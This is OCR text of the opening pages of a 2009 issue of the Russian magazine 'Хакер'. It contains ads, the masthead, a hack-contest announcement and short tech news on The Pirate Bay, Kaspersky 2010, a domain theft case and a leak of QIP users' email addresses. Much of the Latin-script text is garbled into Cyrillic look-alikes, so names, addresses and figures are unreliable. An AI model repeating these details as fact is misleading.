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Товар сертифицирован* 



Компьютер ІРВІ5® А75п 

• Двухъядерный процессор АІѴШ АіИІоп 64X2 

• Видеокарта: ІЧѴШІА СеРогсе 9400 ОТ 512 Мб 

• Объем жесткого диска: 250 Гб 

• Оперативная память: 3072 Мб 



Нпнрав&д рекламы. 



Успех - дело техники! 



ѵѵѵѵѵѵ.ігЬізРС.ги 





В ЭТОМ МЕСЯЦЕ МЫ ЗАПУСКАЕМ НОВЫЙ ПРОЕКТ: 
ПОСТОЯННО ДЕЙСТВУЮЩИЙ ХАК-ЭМУЛЯТОР 

ШУШ.ГІпдОсир.Ги . на базе которого каждый месяц 
будем проводить конкурсы по взлому наших собствен- 
ных серверов. Хорошая новость в том, что квесты будут 
доступны на сайте и после окончания конкурса, и ты 
в любой момент сможешь попробовать свои силы в 
пен-тесте заранее подготовленной системы. Соб- 
ственно, в этом месяце на сайте ѴУѴУѴ\ЛГІПдОсир.ГІІ тебя 
ждет сентябрьский хак-квест от журнала Хакер: спеши 
проявить себя и выиграть ценные призы, предостав- 
ленные торговой маркой ОЕРЕМЦЕК. 

пікііоіг, гл. ред. X 
Ы:1:р://ѵкоп1:ак1:е.ги/сІиЫ 0933209 



1 МЕСТО БЕСПРОВОДНЫЙ НАБОР МЫШЬ+КЛАВИАТУРА 
ОЕЕЕМЕКЗ ВЕКИ 795 

2-4 МЕСТА БЕСПРОВОДНАЯ ЛАЗЕРНАЯ МЫШЬ ОЕРЕМЕК 
321ЖН755 




/РЕДАКЦИЯ 

>Главный редактор 

Никита «пікііогг» Кислицин 
(пікіі 02 @геаІ. хакер, ш) 

>Выпускающий редактор 

Николай«догІ»Андреев 
(догІит@геаІ. хакер, ш) 

>Редакторы рубрик 

ВЗЛОМ 

Дмитрий«РогЬ» Докучаев 
ДогЬ@геаІ. хакер. ги) 

РС_20ЫЕ и ІЛЧІТ5 
Степан «зіер» Ильин 
(зІер@геаІ. хакер, ш) 
ІІМІХОЮ,$УМ\АСКи Р5УСН0 
Андрей «АпсІгизЬоск» Матвеев 
(апсІгизІіоск@геаІ. хакер, ги) 

КОДИ Н Г 

Александр «Ог. Кіоипіг» Лозовский 
(аІехапсІег@геаІ. хакер, ги) 

>Литературный редактор 

Дмитрий Лященко 
(ІуазІісІіепко@датеІапсІ.ги) 

/АКТ 

>Арт-директор 

Евгений Новиков 
(поѵікоѵ.е@датеІапсІ.ги) 

>Верстальщик 

Вера Светлых 
(зѵеІІуИ@датеІапсІ.ги) 

/РѴР 

>Выпускающий редактор 

Степан «5іер» Ильин 
(зІер@геаІ. хакер, ги) 



>Редактор ІІпіх-раздела 

Антон «Апі» Жуков 

>Монтаж видео 

Максим Трубицын 

/рцвизніыс 

(дате.Іапгі 

>Учредитель 

ООО «Гейм Лэнд» 

1 1 9021 , Москва, ул. Тимура Фрунзе, 
д. 1 1 , стр. 44-45 
Тел.: +7 (495) 935-7034 
Факс:+71495) 780-8824 

Генеральный директор 

Дмитрий Агарунов 

Управляющий директор 

Давид Шостак 

>Директор по развитию 

Паша Романовский 

>Директор по персоналу 

Татьяна Гудебская 

>Финансовый директор 

Анастасия Леонова 

Редакционный директор 

Дмитрий Ладыженский 

>РК-менеджер 

Наталья Литвиновская 

>Директор по маркетингу 

Дмитрий Плющев 

Главный дизайнер 

Энди Тернбулл 

>Директор по производству 

Сергей Кучерявый 



/РЕКЛАМА 

/Тел.: (495) 935-7034, факс: (495) 780-8824 



>Директор группы 6АМЕ5 & 0І6ІТАІ. 

Евгения Горячева (догуасбеѵаѲдатеІапсІ.ги) 

>Менеджеры 

Ольга Емельянцева 
Мария Нестерова 
Мария Николаенко 
Максим Соболев 
Надежда Гончарова 
Наталья Мистюкова 
> Администратор 
Мария Бушева 

Работа с рекламными агентствами 

Лидия Стрекнева (зІгекпеѵаѲдатеІапсІ.ги) 

Ртарший менеджер 

Светлана Пинчук 

> Старший трафик-менеджер 

Марья Алексеева 

/ОПТОВАЯ ПРОДАЖА 

>Директор отдела 
дистрибуции 

Андрей Степанов 
(апсІгеу@датеІапсІ.ги) 

Руководитель московского 
направления 

Ольга Девальд 
(беѵаІсІ@датѳІапсІ.ги) 

Руководитель регионального 
направления 

Татьяна Кошелева 
(козІіеІеѵа@датеІапсІ.ги ) 

> Руководитель отдела подписки 

Марина Гончарова 
(допсГіагоѵа@датеІапсІ.ги) 
тел.: (495)935.70.34 
факс: (495)780.88.24 



> Горячая линия по подписке 

тел.: 8 (800) 200.3.999 
Бесплатно для звонящих из России 

> Для писем 

101000, Москва, 

Главпочтамт, а/я 652, Хакер 
Зарегистрировано в Министерстве 
Российской Федерации по делам печати, 
телерадиовещанию и средствам массовых 
коммуникаций ПИ Я 77-1 1802 от 14 
февраля 2002 г. 

Отпечатано втипографии 
«БіеЩѵаз Ріѵаз», Литва. 

Тираж 1 00 000 экземпляров. 

Цена договорная. 

Мнение редакции не обязательно 
совпадаете мнением авторов. Редакция 
уведомляет: все материалы в номере 
предоставляются как информация к 
размышлению. Лица, использующие 
данную информацию в противозаконных 
целях, могут быть привлечены к 
ответственности. Редакция в этих случаях 
ответственности не несет. 

Редакция не несет ответственности за 
содержание рекламных объявлений в 
номере. За перепечатку наших материалов 
без спроса — преследуем. 

По вопросам лицензирования и получения 
прав на использование редакционных ма- 
териалов журнала обращайтесь по адресу: 
сопЩпШдатеІапсІ.ги 

© ООО «Гейм Лэнд», РФ, 2009 



Календарь здоровья 

Осенью медведи медленно отходят в спячку, а вот многочисленные 
вирусы, напротив, просыпаются и всё время пытаются хакнуть твой 
организм. 

Неприятная ситуация. Давай повернём её на 180 градусов — и попро- 
буем взломать эти планы. 

Чтобы перейти от слов кделу — кконкретике — предлагаем тебе оче- 
редную подборку из пяти советов «Календаря Здоровья». Попробуй 
следовать этим советам — и ты будешь лучше выглядеть, лучше чув- 
ствовать себя всю долгую и холодную зиму. 
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Информационная служба Ю ЕІесігопісз 8-800-200-76-76 (бесплатная горячая линия по России). ѵ/\мѵ/.1д.ш 



* Постигнуть неведомое 
** Смарт 

'** Исходное разрешение 
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МЕ0АЫЕѴѴ5 



МАРИЯ «МІРШЫ » НЕФЕДОВА / МІРКІИ.<©КЕАІ..ХАКЕР.Ки / 



МЕ6АЫЕѴѴ5 

ОБО ВСЕМ ЗА ПОСЛЕДНИЙ МЕСЯЦ 



т 




ТНЕ РІРАТЕ ВАѴ 
ЗАКРЫЛСЯ 
И ОТКРЫЛСЯ 

Страсти вокругТРВ, видимо, будут бушевать еще долго. На этот раз по 
трекеру, который какбатарейки из известной рекламы, продолжает«ра- 
ботать, работать и работать», ударили с неожиданной стороны. МАРІАА 
(презрительно-шутливое прозвище «Ассоциации музыкальной и кино- 
индустрии Америки») выиграла суд против шведского трафик-провай- 
дера Віаск Іпіегпеі, вынудив последнего под угрозой штрафа в 500.000 
крон (порядка $70.000) прекратить поддержку ТЬе Рігаіе Вау. В Віаск 
Іпіегпеі сочли должным внять решению суда и доступ кТРВ отрубили. 
Конечно, Віаск Іпіегпеі не был единственным провайдером «Пиратской 
бухты», но он был крупнейшим среди них, так что трекер все же провел в 
«дауне» почти сутки — более мелкие провайдеры, судя по всему, просто 
не справлялись с нагрузкой. Но день спустя ТРВ переехал и вернулся в 
строй. Теперь его создатели призывают пользователей собрать денег в 
поддержку Віаск Іпіегпеі и ехидно обещают выслать всем голливудским 
«виновникам торжества» замечательные футболки с издевательской 
надписью: «Я потратил долгие месяцы и миллионы долларов на закры- 
тие ТЬе Рігаіе Вау и все, что я получил — эту шикарную футболку». 



ПОЧТОВЫЙ СЕРВИС ОМАН НАКОНЕЦ-ТО ВОШЕЛ В ТРОЙКУ ТОПОВЫХ ПОЧТОВЫХ 
ВЕБ-СЛУЖБ, ПОТЕСНИВ АОЬ С ТРЕТЬЕГО МЕСТА. 




Наши финские соседи из компании ІЧокіа 
обнародовали характеристики и фотографии 
своего нового детища — первого в исто- 
рии компании нетбука — ІЧокіа Воокіеі ЗВ. 
Характеристики машинки таковы: процессор 
Іпіеі Аіот 2530 с тактовой частотой 1.6 ГГц 
(512 КБ, 533 МГц, 2 Вт), жесткий диск емкостью 
120 Гб, встроенная поддержка ѴѴіРі(Ь/д/п), 36/ 
НЗБРА и Віиеіооіб, 6Р5-приемник, 10-дюй- 
мовый глянцевый НБ-дисплей. Также Воокіеі 
36 может похвастаться фронтальной веб-каме- 
рой, НБМІ-портом для вывода НБ-видео на 
телевизор, 5Б-ридером, тремя Б5В-портами 



и аудиоразъемом. Заявленное время авто- 
номной работы нетбука составит, ни много, 
ни мало, 12 часов, бтдельно стоит сказать о 
дизайне. При изготовлении Воокіеі 36, так же, 
как в ноутбуках компании Арріе, используется 
цельный лист алюминия. Габариты девайса, 
в итоге, получились следующими: 264 х 185 
х 20 мм, при весе в 1.25 кг. ІЧокіа Воокіеі 36 
выйдет в трех цветовых вариациях — черно- 
го, синего и серебристого цветов, богласно 
некоторым источникам, цена новинки составит 
$799, но официального подтверждения от ком- 
пании ІЧокіа пока нет. 



ШІА 

ВЫПУСКАЕТ НЕТБУК 



ПОДАННЫМ КОМПАНИИ Р0КЕѴШЕ, 46% ХАКЕРОВ. СПЕЦИАЛИЗИРУЮЩИХСЯ 
НА СЕТЕВЫХ АТАКАХ. ЮЗАЮТ БРАУЗЕР М02ІІ1АРІКЕР0Х, А ЕЩЕ 26% 
ПРЕДПОЧИТАЮТ 0РЕКА. 
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Билайн* 

живи на яркой стороне 




Каждый может стать избранным 

Только подключившись к Домашнему Интернету от «Билайн» 
с 1 сентября по 31 декабря 2009 г., ты получишь в подарок бесплатные 
артефакты в популярных онлайн-играх. Выбери один из трех 
высокоскоростных тарифов и стань сильнее в своей игре. 

Оформи свою заявку прямо сейчас! (495)9749999 круглосуточно | ргоѵой.ЬееІіпе.ги 

Реклама. Участвовать в акции могут только абоненты, пользующиеся услугой «Домашний Интернет» от «Билайн». Воспользоваться виртуальным бонусом (артефактом) возможно только один 
раз в каждой игре в течение срока проведения акции. Подробная информация об акции, правилах ее проведения, список игр, в которых можно получить артефакты, сведения о порядке 
получения артефактов, а также подробности об условиях подключения, тарифах и о доступности услуги уточняйте на сайте ргоѵоб.ЬееІіпе.ги. Услуга предоставляется: ООО «СЦС Совинтел», 

ЗАО «Инвестэлектросвязь», ООО «Кубтелеком», ООО «Агентство деловой связи», ЗАО «Сочителеком». 
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ВИДЕО-РЕКЛАМА 
В БУМАЖНОМ 
ЖУРНАЛЕ 



Заголовокэтой новости смахивает на что-то из области 
фантастики (или из книжек про «Гарри Поттера»), однако 
это уже реальность. В середине сентября в продажу посту- 
пил свежий номер журнала Епіегіаіптепі ѴѴеекІу содержа- 
щий видео-рекламу. Принцип работы прост — тончайший 
І_С 0-дисплей, размером примерно с экран мобильника, 
плюс батарейка, которую, кстати, можно будет заменить. По 
аналогии с музыкальными открытками, рекламный ролик 
запустится тогда, когда читатель откроет страницу с ним. 

В ролике будет содержаться анонс программы передач 
американского телеканала СВ5, а также реклама Рерзі. 

По оценкам некоторых специалистов, цена размещения 
подобной рекламы в журнале стиражом в сто тысяч экзем- 
пляров составитболее миллиона долларов. Для сравнения 
— обычная цветная реклама в ЕпІегІаіптепіѴѴеекІу стоит 
порядка 9 центов за копию полного листа и, соответствен- 
но, порядка $9.000 за весь стотысячный тираж. На какие 
только жертвы не готовы пойти рекламодатели, привлекая 
внимание публики к своим продуктам, ведь это уже не пер- 
вый случай — еще в прошлом году журнал Езциіег выпустил 
юбилейный номер с«живой» е-іпк обложкой и аналогич- 
ной рекламой внутри. 



КОМПАНИЯ ЗЕСІШІА ПРОВЕЛА 
ИССЛЕДОВАНИЕ И ОБНАРУЖИЛА 
30 «ДЫРОК» В БРАУЗЕРЕ 
0РЕКА.31 В1Е,32В5АРАК1 
И 115 ВБІПЕГОХ. 

НОВЫЕ 

ткмАИ от золу 



Компания 5опу представила сразу два новых плеера из линейки ѴѴаІктап — 5540 
и Е440К. Отличительная особенность первой модели — встроенные динамики, 
позволяющие слушать музыку и смотреть видео без наушников. Плеер оснащен 
2.4-дюймовым дисплеем с разрешением 320 х 240 и способен воспроизводить ви- 
део со скоростью до 30 кадров. Также имеется 5-полосный эквалайзер и ЕМ-тюнер, 
а заботу о твоих ушах беретна себя система Оупатіс ІЧогтаІігег, автоматически 
выравнивающая уровень громкости. Помимо всего перечисленного 5540 обладает 
встроенным диктофоном и поддерживаетзаписьс радио. Впечатляет и заявлен- 
ный срок работы от одного заряда аккумулятора — до 42 часов для аудио и 6.5 часов 
для видео. В режиме включенных динамиков цифры изменятся на 1 7 и 5 часов 
соответственно. 

Вторая модель обладает более скромным 2" экраном, не имеетвстроенныхди- 
намиков, зато поставляется с док-станцией, которая берет эту функцию на себя. В 
Е440Ктакже присутствует ЕМ-радио с функцией записи. От одной зарядки девайс 
проработаетЗО часов в режиме аудио и 4 часа в режиме видео. Обе модели будут 
поставляться с 8 или 16 гигабайтами памяти. В зависимости отемкости памяти 
цена модели 5540 составит от 6300 до 7800 рублей, а модели Е440К — от 4300 до 
6800 рублей. 
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• Проводная лазерная мышь Окііск 2-1 

• Переключение разрешения 
оптического сенсора 400-3200 сірі 

• Колесо прокрутки в вертикальном 
и горизонтальном направлениях 

• 2 боковые программируемые кнопки 

• Полноскоростной У 50 -порт, 
частота опроса 500 МГц 

• Набор грузов для регулировки массы мыши 

• Встроенная память для сохранения настроек 

• Специальное программное обеспечение в комплекте 



!_а5ег 
Сатіпг; Мои^е 




г / 

ѣ ' | ** 

ѵѵ\л/\л/.оИіск.ги 







Реклама 
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МІСР030РТ + ЫОКІА = 



На днях стало известно отом, 
что компании Місгозоіі и N окіа 
заключили долгосрочное 
стратегическое соглашение, 
ориентированное на разработки 
и продажи в области мобильных 
решений и платформ. Его ключе- 
выми пунктами станут следующие 
вещи: для ІЧокіа будет разработа- 
на поддержка офисных приложе- 
ний М5; уже со следующего года 
ІЧокіа будет поставлять со сво- 
ими продуктами М ісгозобі; (Жісе 



Соттипісаіюг МоЬіІе — корпо- 
ративное решение для обмена 
мгновенными сообщениями и 
организации конференций, вслед 
за которым «подтянутся» и другие 
приложения (Жісе, ПО и серви- 
сы. Также появится Ехсбапде 
АсііѵеВупс для платформы ІЧокіа 
и будет введена ІЧокіа-поддержка 
в Місгозоіі Бузует Сепіей Судя 
по всему, у ВІаскВеггу в скором 
времени появится оченьтяжело- 
весный конкурент. 



| -о 




ТЬе Ргее Епсусіоресііа 



МіеюзоЛ 

+ 

ІМОКІА 



КОНТРОЛЬ В ѴѴІКІРЕйІА 

Самая свободная энциклопедия ѴѴікіребіа, похоже, решила пересмот- 
реть взгляды на однуиз своих основных фишек — свободное внесение 
поправок в любую статью. В англоязычной Вики был проведен опрос, в 
ходе которого 80% участвовавших в нем юзеров высказалисьза введе- 
ние методов контроля над правками. Такчто теперь все корректировки к 
статьям о живых людях будут сначала просматривать редакторы-добро- 
вольцы, которыхуже набралось порядка 25.000 человек. Пока эта мера 
вводится втестовом режиме — на два месяца, но врядли от нее впос- 
ледствии откажутся, ведь банальный вандализм и более тонкая подмена 
данных в статьях — уже да в но известный бич ѴѴікіресІіа. Из последних 
громких инцидентов можно назвать смерть Майкла Джексона, когда 
соответствующая статья едва не захлебнулась множеством домыслов и 
теорий о причинах его кончины. Аужсколько разживым и здравствующим 
людям приписывали дату смерти, и вовсе не счесть. Стоит отметить, что 
аналогичная система проверки изменений редакто рам и уже больше года 
работает в немецкой «Вики», и отэтого пока еще никто не умер :). 



В ИЮНЕ КОЛИЧЕСТВО ПОЛЬЗОВАТЕЛЕЙ 
ТѴѴІТТЕР ПЕРЕВАЛИЛО ЗА ОТМЕТКУ 

44.5 МЛН. ЧЕЛОВЕК. 



ТАНЦУЮТ ВСЕ 

У нас есть хорошие новости для меломанов —теперь прямо в результатах 
поиска Яндекса можно слушать музыку и, что характерно — совершенно 
легально и бесплатно. Дело втом, что Яндексзаключил договоры с веду- 
щими компаниями на музыкальном рынке (например, с ЕМІ и ПпіѵегзаУ, 
и в каталоге музыки Яндекса уже сейчас доступно более ЮО.ОООтреков, а 
в скором будущем эта цифра вырастет до полумиллиона композиций. На 
сегодняшний день для легального прослушивания предлагаются треки 
таких исполнителей какІІ2, Ваттзіеіп, ВоШпд Віопез, ібе Віаск Еуеб 
Реаз и так далее. Чтобы воспользоваться новой функцией, достаточно 
вбить в строку поиска название песни, и, если композиция есть в катало- 
ге, то над результатами поиска отобразится плеер. 
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Прошла всего неделя, а Петр уже стал самым востребованным 
фотографом среди друзей на вечеринках 



СикЬе - уникальный острожный сан> 



1 дк>ан-ѵ/ 



КічгПІЛ н Ім-'і р-Л ж і н п Пр иГуіЕІ,!-! ІЧІ&-ПП. Лл.1ТЛДЛ ;1Ч М.ІірИД-г Г раірн и І.’ И^-гИ ІИ.Э Н-ГТЛ ПіаВДАЙІ и ГіаГТАМг ПП^іЛнТИЯ 

н ч^І'р^нгі-ммы іХРРЁО' ■ Функция СііИт " 1 , пб?-даг- -инп аю щпя п | •пт і пту на стремим фотлианс-ри ■ Ни -га на* чг-ткпстіі 
■іиилноп йлам7л.ірл ! і г-,» ііггг'гнии с рнаінчески^і фичу сирины* “ Очень- йоль-шим ] я дюимиеый 

Ж К дшппгй ’ И* 'ми* оные фумкиин рчДЙн \ нроя.шиг'і. іИігн.пѵчн в апіині 1 мриілир лип гпирчнч ' и.і ■ Огринмый 
*ьн[?ди ■ ці-нині ѵЬъѵм май» МІХКЦН- ИК-н #е-іл Чі^у-п і нцеди ісйАінн*шН фѵіипАНілИгй РЗР&О 1 , 



Тё-гафпн гар-ячгй пинии 

(495) 733-91 -70 

Ремши ГиБ щ ыріясыинрч нн 



С .| Г.І ус. Г л НІ.-ГГЯЦП В !■' Ц(.кі.і іи к гзй фсітцсі^ДИИ КОИППННИ ІМІкОЩ открылись діщрін Мгіщп ^с; Іас: 
тематические .гсс*ции дл-н желающих о-снонтъ искусство фотографии с потощью аерка. 
] кан-еры- Подробности на щ^^.пікргѵгу 

■ Е*рк4 Икслнд ■ $С*нММ Шасмі4 



Основа изображения 



С недавних пор 
Петр фотографирует 
просто великолепно 
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15-ДЮЙМОВЫЙ ОНО 

По циркулирующим в Сети слухам, компания І_Ѳ готовится представить новый продукт — теле- 
визор І_6 ОБЕЙ ТѴ, который на момент выхода в продажу, похоже, будет обладать самым боль- 
шим ОБЕБ-дисплеем среди всех нынешних серийныхтелевизоров. Судя по всему, продукт уже 
полностью готов (что подтверждают и сами представители компании); его прототип был представ- 
лен еще в начале года, но по каким-то причинам продажи в Корее начнутся лишь в декабре, а во 
всем остальном мире и того позже. Согласно предварительным данным срокслужбы ТВ составит 
порядка ЗОтысяч часов, разрешение экрана будет лучше, чему 1 І-дюмовогоЗопуХЕБ-І.тоесть 
— 1366x768 против 960x540, а коэффициент контрастности будет равен 1 .000.000:1 . Стоимость 
девайса пока не разглашается. 

БЕТА-ВЕРСИЯ С00С1.Е СНК0МЕ (ЗА НОМЕРОМ 
3.0.195.4) РАБОТАЕТ НА 30% БЫСТРЕЕ ТЕКУЩЕЙ 
СТАБИЛЬНОЙ ВЕРСИИ. 
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ПЕСОЧНИЦА 
ОТ КАСПЕРСКОГО 

Компания Казрегзку баб представила два новых продукта — комплек- 
сное решение Казрегзку Іпіегпеі: ЗесигТу 2010 (антивирус, антиспам, 
защита от атак) и «Антивирус Касперского 2010». В КІ5 2010 был 
реализован новый подход с защите, названный «Территория безо- 
пасности». Глобальный мониторинг машины призван предотвращать 
заражение компьютера, что гораздо эффективнее, нежели исправле- 
ние последствий уже состоявшегося заражения. Но главной фишкой 
версии 2010 стала ЗапсІЬох («песочница»), на основе которой строится 
функция «Безопасная среда». С ее помощью стал возможен запуск 
подозрительного ПО и сайтов в виртуальной изолированной среде, от- 
куда потенциальный малварь не может нанести вреда пользователь- 
скому компьютеру. В дополнение к перечисленному был переработан 
пользовательский интерфейс обоих продуктов, став более удобным и 
понятным для начинающих пользователей. Не обошлось, конечно, и 
без доработки и оптимизации старых функций — всего в новой версии 
более десятка новых опций и улучшений. Цена КІ5 201 0 составит 1 600 
рублей, а «Антивируса Касперского» 1 200 рублей (продление лицен- 
зии, традиционно, обойдется дешевле). 




И ЗА ДОМЕНЫ 

ТОЖЕ СУДЯТ 

В США впервые в истории собираются осудить человека за кражу 
доменного имени. В Нью-Джерси недавно был арестован гражданин 
Соединенных штатов Даниэль Гонсалвес (Оапіеі бопсаіѵез), и, как выяс- 
нилось, обвиняютего в краже и последующей перепродаже отличного 
доменного имени Р2Р.сот. Еще несколько летназадДаниэльякобы 
взломал аккаунт настоящего владельца Р2Р.сот, перерегистрировал 
домен на себя, а затем продал «красивое» имя на аукционе еВау за круг- 
ленькую сумму в 1 1 1 тысяч долларов. Если обвинению удастся доказать, 
что мошенничество, незаконное хищение персональной информации и 
кража с использованием компьютера имели место, то 25-летнему хакеру 
гроз ит до 1 0 лет тюрьмы. Какие-либо комментарии сам Гонсалвес давать 
отказывается, хотя и находится на свободе — его выпустили под залог в 
$60.000. 
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ГяЙя І яяяяя 



Уникальный 

пользовательский 
интерфейс ЛІ5С 

Сенсорный 



Твоя музыка. Твои правила 



Технология ІСЕрош от Вапд & Оіиізеп 



Затзипд Мизіс Зіоге 



уникальный 

Т ’Т музыкальный магазин. В его огромной 

^ ■' фонотеке (600 000 композиций) ты легко 

найдешь нужный трек. Загружай музыку сразу на свой 
телефон. Затзипд Мизіс Зіоге. Просто, быстро, удобно! 



5,1 -канальная 
система 8НЗ 



Единая служба поддержки: 8-800-555-55-55 (звонок по России бесплатный), 
ѵѵѵѵѵѵ.затзипд.сот. Товар сертифицирован. Реклама. 
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ПОЛНЫЙ БАК 
ДЛЯ НОУТБУКА 

Компания ТозЫЬа уже много летзанимается разработками 
элементов питания, в основе которыхлежиттехнология ЭМРС 
— это разновидность топливного элемента с протонообмен- 
ной мембраной. Топливо (метанол] в них предварительно не 
разлагается с выделением водорода, а используется втоп- 
ливном элементе напрямую. Запустить в продажу ноутбуки, 
мобильники и плееры с использованием ЭМРС-технологий 
ТозЫЬа грозится уже не первый год, показывая работающие 
прототипы на выставках, но каждый раз возникали проблемы, 
идо продаж дел о та к и недошло. И вот представители компа- 
нии в очередной раз объявили, что производство ОМРС-за- 
рядниковдля разнообразных гаджетов начнется в ближайшие 
2 месяца. Если все пройдет как надо, то в продаже зарядные 
устройства должны будут появиться в апреле-сентябре 201 0 
года. Ксожалению, о цене, а главное — о весе новейших дости- 
жений прогресса ничего конкретного пока сказать нельзя. 




МОНЕТИЗАЦИЯ 
ТШТЕК НЕ ЗА ГОРАМИ 



СЛИВ ЗАСЧИТАН! 




Очередной Таіі настиг создателей и пользователей попу- 
лярного (вопреки всему] ІМ 01 Р. На этот раз неприятность 
заключаласьуже не в банальном дефейсе главной 
страницы дір.ги . и даже не в очередной смене протокола 
АОЕом — на этот раз в Сети, ни много, ни мало, обнару- 
жился списокиз-160.000 почтовых адресов пользова- 
телей. В открытом доступе. Самое смешное (или, скорее, 
грустное], что повинны в глобальной утечке оказались 
вовсе не хакеры и злопыхатели, а сами админы одного из сервисов 01 Р — іатез.дір.ги . 
«Сами себе злобные буратины» допустили обыкновенную халатность и уже становящу- 
юся традиционной бестактность. На означенный геймерский сервис подписали кучу 
людей, разумеется, без их ведома (это становится нормой], а по недосмотру админов в 
форуме датез.дір.ги можно было легко и легальноувидеть все е-таіі’ы «посчитанных» 
юзеров. Конечно, кактолько информация об этом дошла до РБК, «дырку» сразу закрыли, 
но база к этому моменту уже успела отправиться в народ — сообщатьоб ошибке никто 
особенно неторопился. База, конечно, далеко не полная, но втоже время 160.694адреса 

— не шутки. Но совсем печально становится оттого, что извинился за всех, только один 
из ведущих разработчиков 01 Р — 5еда-2его: «Сам был шокирован этим вопиющим 
безобразием. Извините, перед всеми нижайше извиняюсь. Я лично извиняюсь, потому 
что, кроме меня, извиняться нието не будет». По поводу последнего 5еда-2его не ошибся 

— РБК предпочитаетхранить молчание и делать вид, что все хорошо. 



ИССЛЕДОВАТЕЛИ 0005’А 




Ш Чш Чм? V 

Один из основателей сервиса ТѵѵіЛег — Биз 
Стоун — признался, что в компании полным 
ходом идет работа над созданием системы ком- 
мерческих аккаунтов, которая будетзапущена в 
обозримом будущем. Однако пугаться не стоит 
— ТѵѵіЛег останется бесплатен для всех, каки 
сейчас, а нововведения предназначаются в 
первую очередь для корпоративных клиентов. 

В ТѵѵіЛегдовольно много крупных компаний, 
например, заинтересованных в сервисах более 
детальной статистики и ее анализа. Также 
Стоун заявил, что после запуска коммерческих 
акков, возможно, будет разработан бизнес- 
ориентированный программный интерфейс 
(АРІ), для создания вокруг Тѵѵіиег«коммер- 
ческого слоя». При этом как-то притеснять 
сторонних разработчиков, которые уже давно 
делают всевозможные приложения для ТѵѵіЛег, 
компания не собирается. 



ЗКѴРЕ 

ПОДРУЖИЛСЯ 

С ѴѴЕВМОИЕУ 

Тем, кто пользуется Зкуре в полном объеме, 
то есть имеет платный аккаунт, наверняка, 
будет приятно узнать, что появился еще 
один способ пополнения счета — теперь 
это можно сделать и при помощи системы 
ѴѴеЬМопеу. Так как ѴѴеЬМопеу у нас пользу- 
ется большой популярностью, этот способ 
явно будет востребован и, по сути, его 
ждали давно. К оплате принимаются ѴѴМВ 
и ѴѴМ2 (последние — если платить через 
« РауВуСазЬ») , дополнительная комиссия за 
услугу не взимается. 



Под эгидой «Центра телекоммуникаций и 
технологий Интернет МГУ имени М. В. Ломоно- 
сова» (ЦТТИ МГУ] летом стартовал проект по 
изучению и противодействию ОБоЗ-атакам. 

Это уже не первый случай, когда МГУ занимает- 
ся исследованием проблем в области высоких 
технологий, но проект ужочень актуален и 
злободневен. На исследование вопроса бро- 
шены лучшие силы и мощности — и ведущие 
специалисты в сферах компьютерной безопас- 
ности, сетевыхтехнологий и веб-разработки, 
и техника соответствующего уровня. Здесь 
совершенно бесплатно может«попроситьубе- 
жища»любой ресурс, находящийся под атакой, 
и его предоставят втечение часа (конечно, 
если сайт не конфликтует с законами РФ] — ис- 
следовательская площадка уже благополучно 
выдерживала нагрузку в 100-1 50 тысяч ботов 
в стуки. Всю коммерческую составляющую 
проекта взяла на себя независимая Лаборато- 
рия Высоких Нагрузок, а данные, собранные в 
результате исследований, будут общедоступны. 
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БЕЗОПАСНОСТЬ 
ПРЕВЫШЕ ВСЕГО 

Компания Ар гісогп, специализирующаяся на устройствах для хранения дан- 
ных, выпустила очень интересный внешний хард — Аедіз РасІІоск. Девайс для 
настоящих параноиков — он не только обеспечивает шифрование данных в 
реальном времени по алгоритму АЕ5-1 28 бит или АЕ5-256 бит, но и оснащен 
системой Р I N -кодов. На лицевой части жесткого диска расположена клавиа- 
тура, так что получить доступ к информации можно только после ввода личного 
идентификационного номера. Помимо перечисленного Аедіз Рабіоск укомп- 
лектован еще и 16-точечной всенаправленной системой защиты отударов. К 
ПКдевайс подсоединяется через 115В. Всего Аргісогп представила 6 моделей 
данного устройства, емкостью от 250 до 500 гигабайт. Цена новинки варьирует- 
ся от $99 (250 Гб, шифрование АЕ5-1 28] до $1 59 (500 Гб, шифрование АЕ5-256]. 



ИССЛЕДОВАНИЕ КОМПАНИИ СОМЫЕѴѴЗ КЕ5ЕАКСН ПОКАЗАЛО. НТО САМАЯ 
ДОРОГАЯ СОТОВАЯ СВЯЗЬ В РОССИИ - В МОСКВЕ. МАГАДАНЕ И НА ЧУКОТКЕ. 

ФУТУРИСТИЧЕСКИЙ 
ТРАНСПОРТ 

В лондонском аэропорту Хитроу должна вот-вот заработать анонсированная еще 2 года назад 
транспортная система будущего — Юга. Автоматизированная дорога, по которой передвигаются 
экологичные беспилотные машинки-кабины, работающие на батареях, пока будет перевозить 
пассажиров от 5-го терминала Хитроу до парковки аэропорта. Стоитсказать, что Хитроу — один из 
крупнейших аэропортов в мире и там нетрудно заблудиться, а расстояния такие, что между терми- 
налами курсируют автобусы. В прочем, теперь нетолько они. Разработкой Юга занимались без 
малого 20 лети создатели надеются, что аэропорт, — это лишь первый шаг на пути к более широкому 
применению новойтранспортной системы. Машинки Юга способны развивать скорость до 40 км\ч 
(что сопоставимо со средней скоростью движения в московском метро], могут принять на бортдо4-х 
пассажиров и, конечно, им неведомы пробки. 






Эпицентр домашних развлечений 

ѴісІеоМаіе Ыеіѵѵогк Месііа Сепіге 1000ѴѴ 



Мультимедиа плеер высокой четкости 



Легко настраиваемая проводная (ЕАЫ) и 
беспроводная (ѴѴІ-Рі) сеть 



Воспроизведение 1080Р РиІІ НО Н.264 фильмов 



Просмотр фото/видео файлов, прослушивание 
музыки на ТВ и домашнем кинотеатре 



Кристально чистое изображение и отличный 
звук по НОМІ 



Поддержка жестких дисков ЗАТА 



Встроенный ВіІТоггепІ клиент 



(ТЕХНОПАРК* (495) 755 6888 
орбург - «Онлайн ТреВД» (612) 713 1227 
тербург - «Юлмарт* (812) 334 9939 
чербург - «КЕЙ» (812) 074 
реп - «ЗІ_одіе» (383) 240 0049 
«Прагма» {846) 270 1701 



Где купить 

Москва - ІІВЫ СотроіегЕ (495) 775 8202 
Москва - «Кообега» (499) 256 Ѵ31 
Москва - «ГІэзІі» (495) 228 0906 
Москва - «ЗГ-одіс» (495) 926 9136 
Москва - «І_ар!ор» (495) 785 7686 



Москва 

Москва 

Москва 

Москва 

Москва 

Москва 



іМрссГиЫ (495) 788 91 11 
.Бит я Байт» (495) 651 6363 
(Махѵййо* (495) 737 43 10 
іЕеростаидарт» (495)661 6717 
.Онлайн Трэйд» (495) 737 4748 
і Сетевая Лаборатория» (495) 784 6490 



ѵѵѵѵѵѵ. сотргоиза. сот 
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«И ТЕБЯ ВЫЛЕЧАТ, И МЕНЯ ВЫЛЕЧАТ» 
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Случилосьто, что не могло не случиться — в 
